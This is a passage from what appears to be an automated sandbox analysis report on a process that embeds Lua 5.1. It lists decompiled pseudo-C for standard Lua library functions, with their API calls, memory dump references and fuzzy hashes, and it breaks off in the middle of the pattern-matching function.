0x00992f52
0x00992f53
0x00992f61

APIs

lua_settop.LUA5.1(?,00000001), ref: 00992F28
lua_type.LUA5.1(?,00000001,?,00000001), ref: 00992F30
lua_pushcclosure.LUA5.1(?,00993020,00000000), ref: 00992F43
lua_pushcclosure.LUA5.1(?,00992F70,00000001), ref: 00992F53

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushcclosure.$lua_settop.lua_type.
String ID:
API String ID: 895800768-0
Opcode ID: d73f5a671702c065719270ede01e2a071ebcd2980df5b7acc5cb1f6c37a1fb1a
Instruction ID: 6c3119788189beef2f71bd2925c061c81532aca87a3b38d77b4016417d58c2d6
Opcode Fuzzy Hash: d73f5a671702c065719270ede01e2a071ebcd2980df5b7acc5cb1f6c37a1fb1a
Instruction Fuzzy Hash: 20E01772AD762032ED22322C6C43FDF219D4F95700F084550F90475182E6C66A9302EE

Uniqueness

Uniqueness Score: -1.00%

Function 10010770, Relevance: 6.0, APIs: 4, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010770(void* __ebx, void* __eflags, intOrPtr _a4) {

				_t13 = __eflags;
				_t9 = _a4;
				E1000F410(__ebx, __eflags, _a4, 1, 5);
				E10001160(_a4, 2);
				if(E10002380(_t13, _t9, 1) == 0) {
					E100018C0(_t9);
					return 1;
				} else {
					return 2;
				}
			}

0x10010770
0x10010771
0x1001077a
0x10010782
0x10010794
0x1001079e
0x100107ac
0x10010796
0x1001079c
0x1001079c

APIs

luaL_checktype.LUA5.1(?,00000001,00000005), ref: 1001077A

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

lua_settop.LUA5.1(?,00000002,?,00000001,00000005), ref: 10010782
lua_next.LUA5.1(?,00000001,?,00000002,?,00000001,00000005), ref: 1001078A
lua_pushnil.LUA5.1(?), ref: 1001079E

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checktype.lua_next.lua_pushnil.lua_settop.lua_type.
String ID:
API String ID: 1261409042-0
Opcode ID: f07f063ddbfadd8bd0b6d73f70e9e7e12faf5077b72ae9696625e079ca1a0d6b
Instruction ID: 4b8d25b01286eefd8432207b5f966833394c0fbc1cdcb66d33611f7161ce9d44
Opcode Fuzzy Hash: f07f063ddbfadd8bd0b6d73f70e9e7e12faf5077b72ae9696625e079ca1a0d6b
Instruction Fuzzy Hash: ADD05E7EB5562032F921A11C7C07FCF12488F017D8F018060FA006E1CBEADABEC202EA

Uniqueness

Uniqueness Score: -1.00%

Function 10013020, Relevance: 6.0, APIs: 4, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E10013020(void* __ebx, long long __fp0, intOrPtr _a4) {
				long long _v8;
				long long _v20;
				intOrPtr _t10;
				void* _t14;
				long long _t15;

				_t15 = __fp0;
				_t10 = _a4;
				E1000F540(__ebx, _t14, __fp0, _t10, 1);
				_v8 = _t15;
				E1000F540(__ebx, _t14, _t15, _t10, 2);
				asm("fxch st0, st1");
				L10016E60();
				_v20 = _v8;
				_push(_t10);
				E100018E0();
				return 1;
			}

0x10013020
0x10013024
0x1001302b
0x10013030
0x10013037
0x10013040
0x10013042
0x10013047
0x1001304e
0x1001304f
0x10013060

APIs

luaL_checknumber.LUA5.1(?,00000001), ref: 1001302B

Part of subcall function 1000F540: lua_tonumber.LUA5.1(?,?), ref: 1000F54F
Part of subcall function 1000F540: lua_isnumber.LUA5.1(?,?), ref: 1000F56C

luaL_checknumber.LUA5.1(?,00000002,?,00000001), ref: 10013037
_CIfmod.MSVCRT ref: 10013042
lua_pushnumber.LUA5.1(?,00000001), ref: 1001304F

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checknumber.$Ifmodlua_isnumber.lua_pushnumber.lua_tonumber.
String ID:
API String ID: 3505366373-0
Opcode ID: 62efd09e0fd31bdd43a27f18d5515e4d5c6ff14394efa4d5e0e858166bc9ba16
Instruction ID: 3c8fecfbbbcc5ac20fa89f7645f4e47f3e8fb0d1f3232a23347d967250443d53
Opcode Fuzzy Hash: 62efd09e0fd31bdd43a27f18d5515e4d5c6ff14394efa4d5e0e858166bc9ba16
Instruction Fuzzy Hash: BBE0CD3A905A1032D501BA18EC43BDE3654DF44745F444C54FBC415186FA7675A843E7

Uniqueness

Uniqueness Score: -1.00%

Function 10013100, Relevance: 6.0, APIs: 4, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E10013100(void* __ebx, long long __fp0, intOrPtr _a4) {
				long long _v8;
				long long _v20;
				intOrPtr _t10;
				void* _t14;
				long long _t15;

				_t15 = __fp0;
				_t10 = _a4;
				E1000F540(__ebx, _t14, __fp0, _t10, 1);
				_v8 = _t15;
				E1000F540(__ebx, _t14, _t15, _t10, 2);
				asm("fxch st0, st1");
				L10016E36();
				_v20 = _v8;
				_push(_t10);
				E100018E0();
				return 1;
			}

0x10013100
0x10013104
0x1001310b
0x10013110
0x10013117
0x10013120
0x10013122
0x10013127
0x1001312e
0x1001312f
0x10013140

APIs

luaL_checknumber.LUA5.1(?,00000001), ref: 1001310B

Part of subcall function 1000F540: lua_tonumber.LUA5.1(?,?), ref: 1000F54F
Part of subcall function 1000F540: lua_isnumber.LUA5.1(?,?), ref: 1000F56C

luaL_checknumber.LUA5.1(?,00000002,?,00000001), ref: 10013117
_CIpow.MSVCRT ref: 10013122
lua_pushnumber.LUA5.1(?,00000001), ref: 1001312F

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checknumber.$Ipowlua_isnumber.lua_pushnumber.lua_tonumber.
String ID:
API String ID: 3267329913-0
Opcode ID: 9972ff8354ea99224abd5f66d5458ebd6cb4cf0481174216d0a2aeada11f27ab
Instruction ID: 82b205bbfb0ca625517aa81951e2f77168dc916638a2a1bc2e654593ed28392c
Opcode Fuzzy Hash: 9972ff8354ea99224abd5f66d5458ebd6cb4cf0481174216d0a2aeada11f27ab
Instruction Fuzzy Hash: 2AE0CD3A905A1072D501BA18AC43BDE3754EF44745F444C54FBC415186FA7675A843EB

Uniqueness

Uniqueness Score: -1.00%

Function 10013250, Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

luaL_checknumber.LUA5.1(?,00000001,?), ref: 1001325D

Part of subcall function 1000F540: lua_tonumber.LUA5.1(?,?), ref: 1000F54F
Part of subcall function 1000F540: lua_isnumber.LUA5.1(?,?), ref: 1000F56C

frexp.MSVCRT ref: 10013265
lua_pushnumber.LUA5.1(?), ref: 10013273
lua_pushinteger.LUA5.1(?,?,?), ref: 1001327E

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checknumber.frexplua_isnumber.lua_pushinteger.lua_pushnumber.lua_tonumber.
String ID:
API String ID: 1448774794-0
Opcode ID: 4c3e952940d7fe02ed21136bd21feda291e681adba472bbe48afe4380d3ef522
Instruction ID: 38bfd3df028f9ea1a7c3705fb8cffd66021b4012f8dedd9ca33422e96ba0164a
Opcode Fuzzy Hash: 4c3e952940d7fe02ed21136bd21feda291e681adba472bbe48afe4380d3ef522
Instruction Fuzzy Hash: 27E0C275408520B7E200FB08EC86EEF73A8EF84680F018858F2C552186DA71BE9083AB

Uniqueness

Uniqueness Score: -1.00%

Function 10013290, Relevance: 6.0, APIs: 4, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E10013290(void* __ebx, long long __fp0, intOrPtr _a4) {
				long long _v12;
				intOrPtr _t8;
				void* _t9;
				void* _t13;
				long long _t14;

				_t14 = __fp0;
				_t8 = _a4;
				E1000F540(__ebx, _t13, __fp0, _t8, 1);
				 *((long long*)(_t9 + 8)) = _t14;
				__imp__ldexp(E1000F5C0(_t13, __fp0, _t8, 2));
				_v12 = _t14;
				_push(_t8);
				E100018E0();
				return 1;
			}

0x10013290
0x10013291
0x100132a4
0x100132a9
0x100132ac
0x100132b2
0x100132b9
0x100132ba
0x100132c8

APIs

luaL_checkinteger.LUA5.1(?,00000002), ref: 10013298

Part of subcall function 1000F5C0: lua_tointeger.LUA5.1(?,?), ref: 1000F5CD
Part of subcall function 1000F5C0: lua_isnumber.LUA5.1(?,?), ref: 1000F5DD

luaL_checknumber.LUA5.1(?,00000001,00000000), ref: 100132A4

Part of subcall function 1000F540: lua_tonumber.LUA5.1(?,?), ref: 1000F54F
Part of subcall function 1000F540: lua_isnumber.LUA5.1(?,?), ref: 1000F56C

ldexp.MSVCRT ref: 100132AC
lua_pushnumber.LUA5.1(?), ref: 100132BA

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_isnumber.$L_checkinteger.L_checknumber.ldexplua_pushnumber.lua_tointeger.lua_tonumber.
String ID:
API String ID: 1481128383-0
Opcode ID: e11082ea3531322a630707df4fe98d7c899de75677f5bdc5092a89fcf24aed54
Instruction ID: 0ab013dac4fb7abbc8ae9a3d9dc7121f1c1cd75f0352ac28228651a314504eba
Opcode Fuzzy Hash: e11082ea3531322a630707df4fe98d7c899de75677f5bdc5092a89fcf24aed54
Instruction Fuzzy Hash: 32D02B35404920A2F1006704BC43BDE3658DF40345F004424F588511C2EA727AA103DB

Uniqueness

Uniqueness Score: -1.00%

Function 10011160, Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E10011160(void* __ebx, void* __fp0, intOrPtr _a4) {
				void* _t11;

				_t8 = _a4;
				E1000F410(__ebx, _t11, _a4, 1, 5);
				E100013D0(_t11, _t8, 0xffffd8ed);
				E100013D0(_t11, _t8, 1);
				_push(0);
				E10001910(__fp0, _t8);
				return 3;
			}

0x10011161
0x1001116a
0x10011175
0x1001117d
0x10011182
0x10011185
0x10011193

APIs

luaL_checktype.LUA5.1(?,00000001,00000005), ref: 1001116A

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

lua_pushvalue.LUA5.1(?,FFFFD8ED,?,00000001,00000005), ref: 10011175
lua_pushvalue.LUA5.1(?,00000001,?,FFFFD8ED,?,00000001,00000005), ref: 1001117D
lua_pushinteger.LUA5.1(?,00000000,?,00000001,?,FFFFD8ED,?,00000001,00000005), ref: 10011185

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushvalue.$L_checktype.lua_pushinteger.lua_type.
String ID:
API String ID: 24721969-0
Opcode ID: cc56a64ef1cc5af9231eb6a0c56c0ec9082d61638d7d27d9c3279e6b1a37eaa0
Instruction ID: d218346341a660f2c125709a8773d1685cc3dc23770557f88f162b1f4a64f410
Opcode Fuzzy Hash: cc56a64ef1cc5af9231eb6a0c56c0ec9082d61638d7d27d9c3279e6b1a37eaa0
Instruction Fuzzy Hash: B7D0C939656A3032F826A2197C43FCF11488F06BC0F050410B6003A9CAA6DA77C256EE

Uniqueness

Uniqueness Score: -1.00%

Function 100105D0, Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100105D0(void* __ebx, void* __fp0, intOrPtr _a4) {
				void* _t11;

				_t8 = _a4;
				E1000F470(__ebx, _t11, _a4, 1);
				E1000F470(__ebx, _t11, _a4, 2);
				E10001AE0(_t8, E10001530(_t11, __fp0, _t8, 1, 2));
				return 1;
			}

0x100105d1
0x100105d8
0x100105e0
0x100105f1
0x100105ff

APIs

luaL_checkany.LUA5.1(?,00000001), ref: 100105D8

Part of subcall function 1000F470: lua_type.LUA5.1(?,?), ref: 1000F47C
Part of subcall function 1000F470: luaL_argerror.LUA5.1(?,?,value expected), ref: 1000F490

luaL_checkany.LUA5.1(?,00000002,?,00000001), ref: 100105E0
lua_rawequal.LUA5.1(?,00000001,00000002,?,00000002,?,00000001), ref: 100105EA
lua_pushboolean.LUA5.1(?,00000000,?,00000001,00000002,?,00000002,?,00000001), ref: 100105F1

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checkany.$L_argerror.lua_pushboolean.lua_rawequal.lua_type.
String ID:
API String ID: 2220746221-0
Opcode ID: 4d3814b43f2f41f3c97d38d8a858475beb2d96364ce402439e82299e8692e379
Instruction ID: 400b934363b9eee0b81d39b10819bdf5e21b76e98e980af2c6a30b824f3b3ece
Opcode Fuzzy Hash: 4d3814b43f2f41f3c97d38d8a858475beb2d96364ce402439e82299e8692e379
Instruction Fuzzy Hash: F2D0C97966BB3031F821A2686C43FEF114C8F467C4F008044FA417A1CAD7C97AC202EA

Uniqueness

Uniqueness Score: -1.00%

Function 10010600, Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010600(void* __ebx, void* __fp0, intOrPtr _a4) {
				void* _t11;

				_t8 = _a4;
				E1000F410(__ebx, _t11, _a4, 1, 5);
				E1000F470(__ebx, _t11, _a4, 2);
				E10001160(_t8, 2);
				E10001BF0(_t11, __fp0, _t8, 1);
				return 1;
			}

0x10010601
0x1001060a
0x10010612
0x1001061a
0x10010622
0x10010630

APIs

luaL_checktype.LUA5.1(?,00000001,00000005), ref: 1001060A

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

luaL_checkany.LUA5.1(?,00000002,?,00000001,00000005), ref: 10010612

Part of subcall function 1000F470: lua_type.LUA5.1(?,?), ref: 1000F47C
Part of subcall function 1000F470: luaL_argerror.LUA5.1(?,?,value expected), ref: 1000F490

lua_settop.LUA5.1(?,00000002,?,00000002,?,00000001,00000005), ref: 1001061A
lua_rawget.LUA5.1(?,00000001,?,00000002,?,00000002,?,00000001,00000005), ref: 10010622

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_type.$L_argerror.L_checkany.L_checktype.lua_rawget.lua_settop.
String ID:
API String ID: 2756819788-0
Opcode ID: c1dc9a9d874028ece1b2d86597cda87594e0cb13ecea84e8539976fcc406626c
Instruction ID: 9be861bf1e511a2615954dee03e73ed7100f5547964adc6b113aadaf0c867803
Opcode Fuzzy Hash: c1dc9a9d874028ece1b2d86597cda87594e0cb13ecea84e8539976fcc406626c
Instruction Fuzzy Hash: 96D0C939696A2031F821A2286C47FCF11498F06B84F018014B6003A1CBA7CA7AC202EA

Uniqueness

Uniqueness Score: -1.00%

Function 1000F230, Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000F230(intOrPtr _a4, intOrPtr _a8, char _a12) {
				void* _t13;

				_t10 = _a4;
				E1000F1C0(_t13, _a4, 1);
				E100019C0(_t10, _a8,  &_a12);
				E100023C0(_t10, 2);
				return E10002370(_t10);
			}

0x1000f231
0x1000f238
0x1000f248
0x1000f250
0x1000f25f

APIs

luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238

Part of subcall function 1000F1C0: lua_getstack.LUA5.1(?,?,?,?), ref: 1000F1D3
Part of subcall function 1000F1C0: lua_getinfo.LUA5.1(?,10019AE8,?,?,?,?), ref: 1000F1EA
Part of subcall function 1000F1C0: lua_pushfstring.LUA5.1(?,%s:%d: ,?,?,?,?,?,?,?,?), ref: 1000F206

lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_where.lua_concat.lua_error.lua_getinfo.lua_getstack.lua_pushfstring.lua_pushvfstring.
String ID:
API String ID: 4101597509-0
Opcode ID: 78510e1a05731b7ba6409e4c63686e18d25e43b837cfccee704360bb648c7365
Instruction ID: 832217e9430fee73a6c9cbed1ea2eef01abb9471d2da7a91ffc999e22f09da3c
Opcode Fuzzy Hash: 78510e1a05731b7ba6409e4c63686e18d25e43b837cfccee704360bb648c7365
Instruction Fuzzy Hash: DBD0A779105522B6F515D710EC43FEF228CCF46280F000409F14076086D6587F8243FB

Uniqueness

Uniqueness Score: -1.00%

Function 100110E0, Relevance: 6.0, APIs: 4, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100110E0(void* __ebx, intOrPtr _a4) {
				void* _t11;

				_t8 = _a4;
				E1000F410(__ebx, _t11, _a4, 1, 5);
				E100013D0(_t11, _t8, 0xffffd8ed);
				E100013D0(_t11, _t8, 1);
				E100018C0(_t8);
				return 3;
			}

0x100110e1
0x100110ea
0x100110f5
0x100110fd
0x10011103
0x10011111

APIs

luaL_checktype.LUA5.1(?,00000001,00000005), ref: 100110EA

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

lua_pushvalue.LUA5.1(?,FFFFD8ED,?,00000001,00000005), ref: 100110F5
lua_pushvalue.LUA5.1(?,00000001,?,FFFFD8ED,?,00000001,00000005), ref: 100110FD
lua_pushnil.LUA5.1(?,?,00000001,?,FFFFD8ED,?,00000001,00000005), ref: 10011103

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushvalue.$L_checktype.lua_pushnil.lua_type.
String ID:
API String ID: 3949423682-0
Opcode ID: d33c98568faa0d1352257ddd9a6d1aa13053bc8eadfc959b8446c8c46f906b4a
Instruction ID: 28097c8dfa802664685f22f5430594742bc985632f50008c7c645218bade1eda
Opcode Fuzzy Hash: d33c98568faa0d1352257ddd9a6d1aa13053bc8eadfc959b8446c8c46f906b4a
Instruction Fuzzy Hash: 7ED0C93955693032F926A2597C43FCF11488F06BC4F014010B5003A9CAAAD937C216EE

Uniqueness

Uniqueness Score: -1.00%

Function 10010740, Relevance: 6.0, APIs: 4, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E10010740(void* __ebx, void* __ecx, intOrPtr _a4) {
				void* _t8;
				void* _t12;

				_t8 = __ecx;
				_t9 = _a4;
				E1000F470(__ebx, _t12, _a4, 1);
				_push(E10001410(_t12, _t9, 1));
				E10001980(_t8, _t9, E10001440(_t9));
				return 1;
			}

0x10010740
0x10010741
0x10010748
0x10010755
0x1001075e
0x1001076c

APIs

luaL_checkany.LUA5.1(?,00000001), ref: 10010748

Part of subcall function 1000F470: lua_type.LUA5.1(?,?), ref: 1000F47C
Part of subcall function 1000F470: luaL_argerror.LUA5.1(?,?,value expected), ref: 1000F490

lua_type.LUA5.1(?,00000001,?,00000001), ref: 10010750
lua_typename.LUA5.1(?,00000000,?,00000001,?,00000001), ref: 10010757
lua_pushstring.LUA5.1(?,00000000,?,00000000,?,00000001,?,00000001), ref: 1001075E

Part of subcall function 10001980: lua_pushnil.LUA5.1(?), ref: 1000198D

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_type.$L_argerror.L_checkany.lua_pushnil.lua_pushstring.lua_typename.
String ID:
API String ID: 946420111-0
Opcode ID: 9cafa7337e85dae264e2c16aec8342b97c4b3dc4216af531aa0e30aebf5a8025
Instruction ID: e2b48a9f37d566be11d4b03ebe451cdabb787dce5c203cf08c46f75f47ba8065
Opcode Fuzzy Hash: 9cafa7337e85dae264e2c16aec8342b97c4b3dc4216af531aa0e30aebf5a8025
Instruction Fuzzy Hash: DAD0C97951652036F511A2246C42FEF110CCF063C8F044000F9006619ACA8A7AD202EA

Uniqueness

Uniqueness Score: -1.00%

Function 10014B40, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 244
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E10014B40() {
				signed int __edi;
				void* _t38;
				signed int _t44;
				intOrPtr* _t60;
				signed int _t61;
				signed int _t76;
				signed int _t77;
				signed int _t79;
				void* _t81;

				_t60 =  *((intOrPtr*)(_t81 + 8));
				_t77 =  *(_t81 + 0x18);
				_t76 =  *(_t81 + 0x18);
				L1:
				while(1) {
					L1:
					while(1) {
						L1:
						while( *_t77 <= 0x29) {
							switch( *((intOrPtr*)(0 +  &M10014D98))) {
								case 0:
									__eax = __edi;
									return __edi;
									goto L45;
								case 1:
									__eflags =  *(__esi + 1);
									if( *(__esi + 1) == 0) {
										__esi =  *(__ebx + 4);
										__eax = 0;
										__eflags = __edi -  *(__ebx + 4);
										0 | __eflags != 0x00000000 = (__eflags != 0) - 1;
										__eax = (__eflags != 0x00000000) - 0x00000001 & __edi;
										__eflags = __eax;
										return __eax;
									} else {
										goto L22;
									}
									goto L45;
								case 2:
									_t45 =  *((intOrPtr*)(_t77 + 1));
									if(_t45 == 0x62) {
										_t76 = E10015220(_t60, _t76, _t77 + 2);
										_t81 = _t81 + 0xc;
										__eflags = _t76;
										if(_t76 == 0) {
											goto L43;
										}
										_t77 = _t77 + 4;
										goto L1;
									} else {
										if(_t45 == 0x66) {
											_t78 = _t77 + 2;
											__eflags =  *(_t77 + 2) - 0x5b;
											if( *(_t77 + 2) != 0x5b) {
												_push("missing \'[\' after \'%%f\' in pattern");
												_push( *((intOrPtr*)(_t60 + 8)));
												E1000F230();
												_t81 = _t81 + 8;
											}
											_t48 = E10014E10(_t76, _t60, _t78);
											_t82 = _t81 + 8;
											__eflags = _t76 -  *_t60;
											 *((intOrPtr*)(_t82 + 0x1c)) = _t48;
											if(_t76 !=  *_t60) {
												 *(_t82 + 0x14) =  *((intOrPtr*)(_t76 - 1));
											} else {
												 *(_t82 + 0x14) = 0;
											}
											_t17 = _t48 - 1; // -1
											_t80 = _t17;
											_push(_t80);
											_push(_t78);
											_push( *(_t82 + 0x14) & 0x000000ff);
											_t51 = E10014E80();
											_t83 = _t82 + 0xc;
											__eflags = _t51;
											if(_t51 != 0) {
												goto L43;
											}
											_push(_t80);
											_push(_t78);
											_push(0);
											_t52 = E10014E80();
											_t81 = _t83 + 0xc;
											__eflags = _t52;
											if(_t52 == 0) {
												goto L43;
											}
											_t77 =  *(_t81 + 0x1c);
											goto L1;
										} else {
											if( *__imp____mb_cur_max <= 1) {
												_t56 =  *( *__imp___pctype + (_t45 & 0x000000ff) * 2) & 0x00000004;
												__eflags = _t56;
											} else {
												_t56 = _t45 & 0x000000ff;
												_push(4);
												_push(_t56);
												__imp___isctype();
												_t81 = _t81 + 8;
											}
											if(_t56 == 0) {
												goto L22;
											} else {
												_t76 = E10015410(_t60, _t76, 0);
												_t81 = _t81 + 0xc;
												if(_t76 == 0) {
													L43:
													__eflags = 0;
													return 0;
												}
												_t77 = _t77 + 2;
												goto L1;
											}
										}
									}
									goto L45;
								case 3:
									_t30 = __esi + 1; // 0x0
									__eax = _t30;
									__eflags =  *(__esi + 1) - 0x29;
									if( *(__esi + 1) != 0x29) {
										return __eax;
									} else {
										__eflags = __esi;
										return E10015350(__ebx, __edi, __esi, 0xfffffffe);
									}
									goto L45;
								case 4:
									__eflags = __esi;
									return E100153A0(__ebx, __edi, __esi);
									L45:
								case 5:
									goto L22;
							}
						}
						L22:
						_t79 = E10014E10(_t76, _t60, _t77);
						_t81 = _t81 + 8;
						if(_t76 >=  *((intOrPtr*)(_t60 + 4))) {
							L25:
							_t61 = 0;
						} else {
							_t44 = E100151C0(0, _t77, _t79);
							_t81 = _t81 + 0xc;
							if(_t44 == 0) {
								goto L25;
							} else {
								_t61 = 1;
							}
						}
						_t38 =  *_t79 + 0xffffffd6;
						if(_t38 > 0x15) {
							L31:
							if(_t61 == 0) {
								goto L43;
							}
							_t76 = _t76 + 1;
							_t77 = _t79;
							continue;
						} else {
							switch( *((intOrPtr*)(0 +  &M10014DDC))) {
								case 0:
									return E10015290(__ebx, __edi, __esi, __ebp);
									goto L45;
								case 1:
									__eflags = __ecx;
									if(__ecx == 0) {
										goto L43;
									}
									__eflags = __edi;
									return E10015290(__ebx, __edi, __esi, __ebp);
									goto L45;
								case 2:
									_push(__ebp);
									_push(__esi);
									_push(__edi);
									_push(__ebx);
									__eax = E100152F0();
									__esp = __esp + 0x10;
									return __eax;
									goto L45;
								case 3:
									__eflags = _t61;
									if(_t61 == 0) {
										L30:
										_t77 = _t79 + 1;
										goto L1;
									} else {
										_push(_t79 + 1);
										_push(_t76 + 1);
										_push(_t60);
										_t41 = E10014B40();
										_t81 = _t81 + 0xc;
										__eflags = _t41;
										if(_t41 != 0) {
